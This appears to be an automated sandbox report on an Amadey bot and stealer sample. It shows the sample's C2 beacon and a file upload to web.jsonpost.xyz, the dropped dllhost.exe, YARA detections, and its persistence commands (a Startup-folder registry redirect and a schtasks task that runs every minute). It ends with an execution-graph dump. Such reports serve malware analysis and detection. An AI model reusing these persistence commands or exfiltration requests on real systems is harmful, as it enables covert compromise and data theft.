                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID: 113
                                                                                Source IP: 192.168.2.4
                                                                                Source Port: 49915
                                                                                Destination IP: 72.52.178.23
                                                                                Destination Port: 80
                                                                                PID: 7608
                                                                                Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp: Nov 29, 2024 01:53:26.175827026 CET
                                                                                Bytes transferred: 195
                                                                                Direction: OUT
                                                                                Data:
                                                                                POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 97961
                                                                                Cache-Control: no-cache
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID: 114
                                                                                Source IP: 192.168.2.4
                                                                                Source Port: 49921
                                                                                Destination IP: 72.52.178.23
                                                                                Destination Port: 80
                                                                                PID: 7608
                                                                                Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp: Nov 29, 2024 01:53:27.344398975 CET
                                                                                Bytes transferred: 235
                                                                                Direction: OUT
                                                                                Data:
                                                                                POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0



                                                                                Target ID:0
                                                                                Start time:19:51:53
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\Desktop\S7AGd447vH.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\S7AGd447vH.exe"
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:19:51:58
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe"
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 66%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
                                                                                Imagebase:0x240000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
                                                                                Imagebase:0xd20000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:19:52:02
                                                                                Start date:28/11/2024
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
                                                                                Imagebase:0x9c0000
                                                                                File size:59'392 bytes
                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:19:52:04
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Amadey_c4df8d4a, Description: unknown, Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:19:53:01
                                                                                Start date:28/11/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Imagebase:0x400000
                                                                                File size:410'635 bytes
                                                                                MD5 hash:5F5C1A5DF77079F56EB5A61D19666728
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:1.3%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:53
41e5ef 20086->20087 20100 41e647 20086->20100 20089 41e04e 20087->20089 20090 417051 _free 14 API calls 20087->20090 20091 41e081 20089->20091 20090->20089 20092 41e087 20091->20092 20094 41e0ab 20091->20094 20271 4187e7 LeaveCriticalSection 20092->20271 20094->20083 20096 413015 __cftof 37 API calls 20095->20096 20097 4130aa 20096->20097 20098 4130bc 20097->20098 20146 417d86 20097->20146 20098->20086 20101 41e664 20100->20101 20102 41e692 20101->20102 20103 41e679 20101->20103 20152 41880a 20102->20152 20104 413c44 __dosmaperr 14 API calls 20103->20104 20106 41e67e 20104->20106 20110 413c57 _free 14 API calls 20106->20110 20108 41e6a0 20111 413c44 __dosmaperr 14 API calls 20108->20111 20109 41e6b7 20165 41e300 CreateFileW 20109->20165 20136 41e68b 20110->20136 20113 41e6a5 20111->20113 20115 413c57 _free 14 API calls 20113->20115 20114 41e76d GetFileType 20117 41e778 GetLastError 20114->20117 20118 41e7bf 20114->20118 20115->20106 20116 41e742 GetLastError 20120 413c21 __dosmaperr 14 API calls 20116->20120 20121 413c21 __dosmaperr 14 API calls 20117->20121 20167 418755 20118->20167 20119 41e6f0 20119->20114 20119->20116 20166 41e300 CreateFileW 20119->20166 20120->20106 20123 41e786 CloseHandle 20121->20123 20123->20106 20126 41e7af 20123->20126 20125 41e735 20125->20114 20125->20116 20128 413c57 _free 14 API calls 20126->20128 20130 41e7b4 20128->20130 20129 41e82c 20134 41e833 20129->20134 20191 41e0ad 20129->20191 20130->20106 20137 4171a4 __wsopen_s 28 API calls 20134->20137 20135 41e86f 20135->20136 20138 41e8eb CloseHandle 20135->20138 20136->20087 20137->20136 20217 41e300 CreateFileW 20138->20217 20140 41e916 20141 41e920 GetLastError 20140->20141 20142 41e94c 20140->20142 20143 413c21 __dosmaperr 14 API calls 20141->20143 20142->20136 20144 41e92c 20143->20144 20145 41891d __wsopen_s 15 API calls 20144->20145 20145->20142 20149 417b94 20146->20149 20150 417cc3 _free 5 API calls 20149->20150 20151 417baa 20150->20151 20151->20098 20153 418816 
___scrt_is_nonwritable_in_current_image 20152->20153 20218 416943 EnterCriticalSection 20153->20218 20155 41881d 20156 418864 20155->20156 20157 418842 20155->20157 20162 4188b1 EnterCriticalSection 20155->20162 20219 418914 20156->20219 20159 4185e4 __wsopen_s 15 API calls 20157->20159 20161 418847 20159->20161 20161->20156 20222 418732 EnterCriticalSection 20161->20222 20162->20156 20163 4188be LeaveCriticalSection 20162->20163 20163->20155 20165->20119 20166->20125 20168 418764 20167->20168 20169 4187cd 20167->20169 20168->20169 20174 41878a __wsopen_s 20168->20174 20170 413c57 _free 14 API calls 20169->20170 20171 4187d2 20170->20171 20172 413c44 __dosmaperr 14 API calls 20171->20172 20173 4187ba 20172->20173 20173->20129 20176 41e50f 20173->20176 20174->20173 20175 4187b4 SetStdHandle 20174->20175 20175->20173 20177 41e569 20176->20177 20178 41e537 20176->20178 20177->20129 20178->20177 20179 41f87f __fread_nolock 27 API calls 20178->20179 20180 41e547 20179->20180 20181 41e557 20180->20181 20182 41e56d 20180->20182 20183 413c44 __dosmaperr 14 API calls 20181->20183 20184 41b29a __fread_nolock 37 API calls 20182->20184 20185 41e55c 20183->20185 20186 41e57f 20184->20186 20185->20177 20188 413c57 _free 14 API calls 20185->20188 20187 41e595 20186->20187 20224 4220ae 20186->20224 20187->20185 20189 41f87f __fread_nolock 27 API calls 20187->20189 20188->20177 20189->20185 20192 41e0dd 20191->20192 20208 41e239 20191->20208 20198 41e0fd 20192->20198 20264 416442 20192->20264 20194 41e0f4 20195 41e2f5 20194->20195 20194->20198 20196 4156cc __cftof 11 API calls 20195->20196 20197 41e2ff 20196->20197 20200 41e1b1 20198->20200 20201 41f87f __fread_nolock 27 API calls 20198->20201 20198->20208 20199 41b29a __fread_nolock 37 API calls 20204 41e1d6 20199->20204 20200->20199 20203 41e234 20200->20203 20200->20208 20209 41e204 20200->20209 20202 41e218 20201->20202 20207 41f87f __fread_nolock 27 API calls 20202->20207 20202->20209 20205 413c57 _free 14 API calls 
20203->20205 20204->20203 20206 41e284 20204->20206 20204->20209 20210 41e262 20204->20210 20211 41e255 20204->20211 20205->20208 20213 41f87f __fread_nolock 27 API calls 20206->20213 20207->20200 20208->20134 20208->20135 20209->20203 20209->20208 20215 419620 __wsopen_s 62 API calls 20209->20215 20210->20206 20212 41e269 20210->20212 20214 413c57 _free 14 API calls 20211->20214 20216 41f87f __fread_nolock 27 API calls 20212->20216 20213->20209 20214->20203 20215->20209 20216->20209 20217->20140 20218->20155 20223 41698b LeaveCriticalSection 20219->20223 20221 418884 20221->20108 20221->20109 20222->20156 20223->20221 20259 422061 20224->20259 20226 4221fd 20227 413c57 _free 14 API calls 20226->20227 20228 422183 20227->20228 20234 41f87f __fread_nolock 27 API calls 20228->20234 20230 4221af 20230->20228 20231 41f87f __fread_nolock 27 API calls 20230->20231 20235 4221c7 20231->20235 20232 422104 20233 41b7df _free 14 API calls 20232->20233 20236 422110 20233->20236 20237 422214 20234->20237 20235->20226 20239 4189ae __wsopen_s 25 API calls 20235->20239 20238 422118 20236->20238 20251 422125 __wsopen_s 20236->20251 20237->20187 20240 413c57 _free 14 API calls 20238->20240 20241 4221d7 SetEndOfFile 20239->20241 20258 42211d 20240->20258 20241->20228 20242 4221e3 20241->20242 20243 413c57 _free 14 API calls 20242->20243 20245 4221e8 20243->20245 20244 413c57 _free 14 API calls 20247 4221a4 20244->20247 20246 413c44 __dosmaperr 14 API calls 20245->20246 20248 4221f3 GetLastError 20246->20248 20249 417051 _free 14 API calls 20247->20249 20248->20226 20249->20228 20250 419712 __wsopen_s 60 API calls 20250->20251 20251->20250 20252 42218a 20251->20252 20255 422174 __wsopen_s 20251->20255 20253 413c44 __dosmaperr 14 API calls 20252->20253 20254 42218f 20253->20254 20256 413c57 _free 14 API calls 20254->20256 20254->20258 20257 417051 _free 14 API calls 20255->20257 20256->20258 20257->20228 20258->20244 20260 41f87f __fread_nolock 27 API calls 20259->20260 20261 42207a 
20260->20261 20262 41f87f __fread_nolock 27 API calls 20261->20262 20263 422089 20262->20263 20263->20226 20263->20230 20263->20232 20265 416463 20264->20265 20266 41644e 20264->20266 20265->20194 20267 413c57 _free 14 API calls 20266->20267 20268 416453 20267->20268 20269 41569f __cftof 25 API calls 20268->20269 20270 41645e 20269->20270 20270->20194 20271->20094 20272 40f8b0 20273 40f8d0 20272->20273 20273->20273 20274 40fc60 26 API calls 20273->20274 20275 40f8e2 20274->20275 18293 401f40 GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 18294 401f9d LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18293->18294 18295 40209f 7 API calls 18293->18295 18294->18295 18296 401fe5 18294->18296 18296->18295 18297 401fed LookupAccountNameW 18296->18297 18297->18295 18298 40200c ConvertSidToStringSidW 18297->18298 18298->18295 18299 40201f 18298->18299 18302 40fc60 18299->18302 18301 402096 18306 40fc76 18302->18306 18307 40fc9e 18302->18307 18303 40fd7c 18335 4103a0 18303->18335 18305 40fd81 18338 401e10 18305->18338 18306->18301 18307->18303 18309 40fce6 18307->18309 18310 40fd0b 18307->18310 18309->18305 18317 41074a 18309->18317 18313 41074a 26 API calls 18310->18313 18314 40fcf7 __fread_nolock 18310->18314 18313->18314 18315 40fd5e 18314->18315 18330 4156af 18314->18330 18315->18301 18318 41074f ___std_exception_copy 18317->18318 18319 410769 18318->18319 18321 41076b 18318->18321 18353 41571a 18318->18353 18319->18314 18322 401e10 Concurrency::cancel_current_task 18321->18322 18323 410775 18321->18323 18344 4113a6 18322->18344 18325 4113a6 Concurrency::cancel_current_task RaiseException 18323->18325 18328 410c72 18325->18328 18326 401e2c 18347 411324 18326->18347 18331 41563b __cftof 25 API calls 18330->18331 18332 4156be 18331->18332 18333 4156cc __cftof 11 API calls 18332->18333 18334 4156cb 18333->18334 18531 41070a 18335->18531 18339 401e1e Concurrency::cancel_current_task 18338->18339 18340 4113a6 Concurrency::cancel_current_task 
RaiseException 18339->18340 18341 401e2c 18340->18341 18342 411324 ___std_exception_copy 25 API calls 18341->18342 18343 401e53 18342->18343 18345 4113f0 RaiseException 18344->18345 18346 4113c0 18344->18346 18345->18326 18346->18345 18348 411331 ___std_exception_copy 18347->18348 18352 401e53 18347->18352 18351 41135e 18348->18351 18348->18352 18356 416779 18348->18356 18365 4151b7 18351->18365 18352->18314 18520 415747 18353->18520 18357 416786 18356->18357 18359 416794 18356->18359 18357->18359 18363 4167ab 18357->18363 18368 413c57 18359->18368 18360 41679c 18371 41569f 18360->18371 18362 4167a6 18362->18351 18363->18362 18364 413c57 _free 14 API calls 18363->18364 18364->18360 18366 417051 _free 14 API calls 18365->18366 18367 4151cf 18366->18367 18367->18352 18374 417a99 GetLastError 18368->18374 18370 413c5c 18370->18360 18494 41563b 18371->18494 18373 4156ab 18373->18362 18375 417ab0 18374->18375 18378 417ab6 18374->18378 18397 417e80 18375->18397 18394 417abc SetLastError 18378->18394 18402 417ebf 18378->18402 18383 417b03 18385 417ebf _free 6 API calls 18383->18385 18384 417aec 18386 417ebf _free 6 API calls 18384->18386 18388 417b0f 18385->18388 18387 417afa 18386->18387 18414 417051 18387->18414 18389 417b13 18388->18389 18390 417b24 18388->18390 18392 417ebf _free 6 API calls 18389->18392 18420 417770 18390->18420 18392->18387 18394->18370 18396 417051 _free 12 API calls 18396->18394 18425 417cc3 18397->18425 18399 417e9c 18400 417ea5 18399->18400 18401 417eb7 TlsGetValue 18399->18401 18400->18378 18403 417cc3 _free 5 API calls 18402->18403 18404 417edb 18403->18404 18405 417ad4 18404->18405 18406 417ef9 TlsSetValue 18404->18406 18405->18394 18407 41b7df 18405->18407 18408 41b7ec _free 18407->18408 18409 41b82c 18408->18409 18410 41b817 RtlAllocateHeap 18408->18410 18413 41571a _free 2 API calls 18408->18413 18411 413c57 _free 13 API calls 18409->18411 18410->18408 18412 417ae4 18410->18412 18411->18412 18412->18383 18412->18384 18413->18408 18415 
41705c HeapFree 18414->18415 18419 417085 _free 18414->18419 18416 417071 18415->18416 18415->18419 18417 413c57 _free 12 API calls 18416->18417 18418 417077 GetLastError 18417->18418 18418->18419 18419->18394 18438 417604 18420->18438 18426 417cf1 18425->18426 18427 417ced _free 18425->18427 18426->18427 18431 417bfc 18426->18431 18427->18399 18430 417d0b GetProcAddress 18430->18427 18436 417c0d 18431->18436 18432 417cb8 18432->18427 18432->18430 18433 417c2b LoadLibraryExW 18434 417c46 GetLastError 18433->18434 18433->18436 18434->18436 18435 417ca1 FreeLibrary 18435->18436 18436->18432 18436->18433 18436->18435 18437 417c79 LoadLibraryExW 18436->18437 18437->18436 18439 417610 ___scrt_is_nonwritable_in_current_image 18438->18439 18452 416943 EnterCriticalSection 18439->18452 18441 41761a 18453 41764a 18441->18453 18444 417716 18445 417722 ___scrt_is_nonwritable_in_current_image 18444->18445 18457 416943 EnterCriticalSection 18445->18457 18447 41772c 18458 4178f7 18447->18458 18449 417744 18462 417764 18449->18462 18452->18441 18456 41698b LeaveCriticalSection 18453->18456 18455 417638 18455->18444 18456->18455 18457->18447 18459 41792d __cftof 18458->18459 18460 417906 __cftof 18458->18460 18459->18449 18460->18459 18465 41d57b 18460->18465 18493 41698b LeaveCriticalSection 18462->18493 18464 417752 18464->18396 18466 41d5fb 18465->18466 18468 41d591 18465->18468 18469 417051 _free 14 API calls 18466->18469 18492 41d649 18466->18492 18467 41d6ec __cftof 14 API calls 18476 41d657 18467->18476 18468->18466 18470 41d5c4 18468->18470 18474 417051 _free 14 API calls 18468->18474 18471 41d61d 18469->18471 18480 417051 _free 14 API calls 18470->18480 18491 41d5e6 18470->18491 18472 417051 _free 14 API calls 18471->18472 18475 41d630 18472->18475 18473 417051 _free 14 API calls 18477 41d5f0 18473->18477 18479 41d5b9 18474->18479 18481 417051 _free 14 API calls 18475->18481 18478 41d6b7 18476->18478 18490 417051 14 API calls _free 18476->18490 18482 417051 _free 14 API 
calls 18477->18482 18483 417051 _free 14 API calls 18478->18483 18484 41d158 ___free_lconv_mon 14 API calls 18479->18484 18485 41d5db 18480->18485 18486 41d63e 18481->18486 18482->18466 18487 41d6bd 18483->18487 18484->18470 18488 41d256 __cftof 14 API calls 18485->18488 18489 417051 _free 14 API calls 18486->18489 18487->18459 18488->18491 18489->18492 18490->18476 18491->18473 18492->18467 18493->18464 18495 417a99 _free 14 API calls 18494->18495 18496 415646 18495->18496 18498 415654 18496->18498 18502 4156cc IsProcessorFeaturePresent 18496->18502 18498->18373 18499 41569e 18500 41563b __cftof 25 API calls 18499->18500 18501 4156ab 18500->18501 18501->18373 18503 4156d8 18502->18503 18506 4154f3 18503->18506 18507 41550f ___scrt_fastfail 18506->18507 18508 41553b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18507->18508 18511 41560c ___scrt_fastfail 18508->18511 18510 41562a GetCurrentProcess TerminateProcess 18510->18499 18512 4111f2 18511->18512 18513 4111fb 18512->18513 18514 4111fd IsProcessorFeaturePresent 18512->18514 18513->18510 18516 41123f 18514->18516 18519 411203 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18516->18519 18518 411322 18518->18510 18519->18518 18521 415753 ___scrt_is_nonwritable_in_current_image 18520->18521 18526 416943 EnterCriticalSection 18521->18526 18523 41575e 18527 41579a 18523->18527 18526->18523 18530 41698b LeaveCriticalSection 18527->18530 18529 415725 18529->18318 18530->18529 18536 410649 18531->18536 18534 4113a6 Concurrency::cancel_current_task RaiseException 18535 410729 18534->18535 18539 4105bf 18536->18539 18540 411324 ___std_exception_copy 25 API calls 18539->18540 18541 4105eb 18540->18541 18541->18534 19457 7fe420ec LoadLibraryA 18542 405f60 18607 40f8f0 18542->18607 18544 405f6f 18621 403d90 18544->18621 18546 405f77 18633 40fda0 18546->18633 18548 40633a 18551 4156af 25 API calls 18548->18551 18549 405f91 18549->18548 18550 406066 18549->18550 
18553 40f8f0 26 API calls 18550->18553 18599 406074 18550->18599 18552 40633f 18551->18552 18554 4156af 25 API calls 18552->18554 18556 406096 18553->18556 18557 406344 18554->18557 18555 40fc60 26 API calls 18558 406304 18555->18558 18559 403d90 26 API calls 18556->18559 18560 4156af 25 API calls 18557->18560 18562 406349 __wsopen_s 18557->18562 18561 40609e 18559->18561 18560->18562 18563 40fda0 26 API calls 18561->18563 18641 412e34 18562->18641 18577 4060b8 18563->18577 18567 406387 18569 40f8f0 26 API calls 18567->18569 18568 40655a 18572 406396 18569->18572 18570 4064ef 18570->18568 18571 4156af 25 API calls 18570->18571 18573 40657a 18571->18573 18574 403d90 26 API calls 18572->18574 18575 40639e 18574->18575 18578 412e34 28 API calls 18575->18578 18576 40618d 18579 40f8f0 26 API calls 18576->18579 18576->18599 18577->18552 18577->18576 18580 4063bb 18578->18580 18581 4061bd 18579->18581 18582 4063ea 18580->18582 18587 40656b 18580->18587 18583 403d90 26 API calls 18581->18583 18584 40f8f0 26 API calls 18582->18584 18585 4061c5 18583->18585 18586 406415 18584->18586 18590 40fda0 26 API calls 18585->18590 18588 403d90 26 API calls 18586->18588 18589 4156af 25 API calls 18587->18589 18591 40641d 18588->18591 18592 406570 18589->18592 18597 4061df 18590->18597 18594 412e34 28 API calls 18591->18594 18593 4156af 25 API calls 18592->18593 18593->18570 18595 40643a 18594->18595 18595->18592 18601 406469 18595->18601 18597->18557 18597->18599 18599->18555 18602 4064e0 18601->18602 18657 4153b8 18601->18657 18660 413b7b 18601->18660 18670 412d51 18601->18670 18677 412d25 18601->18677 18604 412ec2 67 API calls 18602->18604 18605 4064e6 18604->18605 18606 412ec2 67 API calls 18605->18606 18606->18570 18608 40f915 18607->18608 18609 40f91c 18608->18609 18610 40f96e 18608->18610 18611 40f94f 18608->18611 18609->18544 18615 41074a 26 API calls 18610->18615 18619 40f963 __fread_nolock 18610->18619 18612 40f9a4 18611->18612 18613 40f956 18611->18613 18616 401e10 
